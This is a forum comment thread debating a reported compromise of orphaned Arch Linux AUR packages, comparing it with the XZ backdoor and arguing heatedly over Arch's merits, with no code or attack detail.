The security situation with the Arch Linux AUR got a lot worse

Quoting: GerarderloperSo far non of my AUR packages have been touched, but I am waiting for the dreaded updates for any of them to come where suddenly a 'new' maintainer appears out of nowhere...

This only affects orphaned PKGBUILDs. If yours all have maintainers then they'll be fine.

Quoting: dibzWow, some easily offended folks in here

Anything that pulls source from something like github some jackass can compromise by having their keys stolen - or if they're just bored and feeling frisky.

So yes, modern development practices affect rolling distros more because they tend to use the latest and greatest all the time - which is not always great.

Again, the rolling release official repos of ARCH were not affected by the AUR hack. You're confusing two were different concepts based on what I can only assume is your disdain towards that particular OS.

Rolling release distros don't just pull from git straight into their official repos and call it a day. No distro does that.

Take the XZ compromise not all that long ago, which released a new "stable" compromised version that actually made it on to user systems - y'all know the problem commit was only about a month old? That's a crazy short timeline.

The AUR hack was found and actually fixed in under two weeks so that analogy really doesn't strengthen your position.

While it's a wonderful idea to let anyone come along and package extra apps and such if they're missing from Arch Linux repositories

No, it's not, and never has been. Arch is a clownshow, I've been saying it for years. It became the choice for newbies because it intentionally makes installing it laborious, so they feel like they're hacking the Gibson or something. "Hey look at me, I survived installing Arch Linux." Yeah, congrats, the list of things you typed in using a guide, and that you won't remember, are pretty impressive. Maybe it's a better idea to run a "newbie" (i.e. well engineered) distro like Ubuntu or Fedora after all. ¯\_(ツ)_/¯

Quoting: mercsterArch is a clownshow, I've been saying it for years.

Arch is only a clownshow if you don't know what you're doing, and you go into it unaware of its DIY ethos. When I was a beginner, I didn't know what I was doing. I made mistakes, and I broke my installation a few times - but I've learned, and I had fun learning. I don't even remember the last time I experienced any problems on my Arch box, and if I do run into any problems again, it's not gonna matter cause I'll know how to fix it. I owe a lot of my Linux sysadmin skills from the experience I gained from using Arch.

So you downloaded a dirty package from the AUR? Now you've learned, and you won't do that again, right?

TL;DR - Arch is not a clownshow.

Quoting: mercsterArch is a clownshow, I've been saying it for years. It became the choice for newbies because it intentionally makes installing it laborious, so they feel like they're hacking the Gibson or something. "Hey look at me, I survived installing Arch Linux." Yeah, congrats, the list of things you typed in using a guide, and that you won't remember, are pretty impressive. Maybe it's a better idea to run a "newbie" (i.e. well engineered) distro like Ubuntu or Fedora after all. ¯\_(ツ)_/¯

Wow this is one helluva comment. I think you deserve a gold star for getting SO many things wrong all at the same time! quite incredible really, I'm pretty impressed. Let's see, where shall we begin?

• Arch is not a clownshow (lol who says stuff like this? I mean?)


• Arch is not the distro of choice for newbies and never has been


• Arch does not intentionally make installing it difficult


• Fedora is not a newbie distro, are you confusing this with mint or something?

I'm pretty stunned by the Arch hate in this comments thread, and SO MUCH of it is just ignorant ranting that has no basis in reality. People can't seem to grasp the fact that the AUR is not in fact the distro itself, or are confused about what the AUR even is, or how Arch even functions, but still complain about it, or make up a bunch of nonsense like the above. Oof.

Quoting: JarmerI'm pretty stunned by the Arch hate in this comments thread, and SO MUCH of it is just ignorant ranting that has no basis in reality. People can't seem to grasp the fact that the AUR is not in fact the distro itself, or are confused about what the AUR even is, or how Arch even functions, but still complain about it, or make up a bunch of nonsense like the above. Oof.

There's been some odd stuff. To the point where I feel the need to note that while Arch is not my distro and not targeted at people like me and I am not likely to consider using it, I am nonetheless aware that it serves its purposes well and there are skilled people working hard on it and the AUR is not the same as the overall distro repository.

Quoting: Jarmer

• Arch is not a clownshow (lol who says stuff like this? I mean?)

Just replying to a guy that said that it was? K there bud. Chill out.

Edit: Actually, I owe you an apology. I misread the quote, and thought you were replying to me. Sorry about that. I owe you a beer.

Last edited by Slaxer on 17 Jun 2026 at 8:47 pm UTC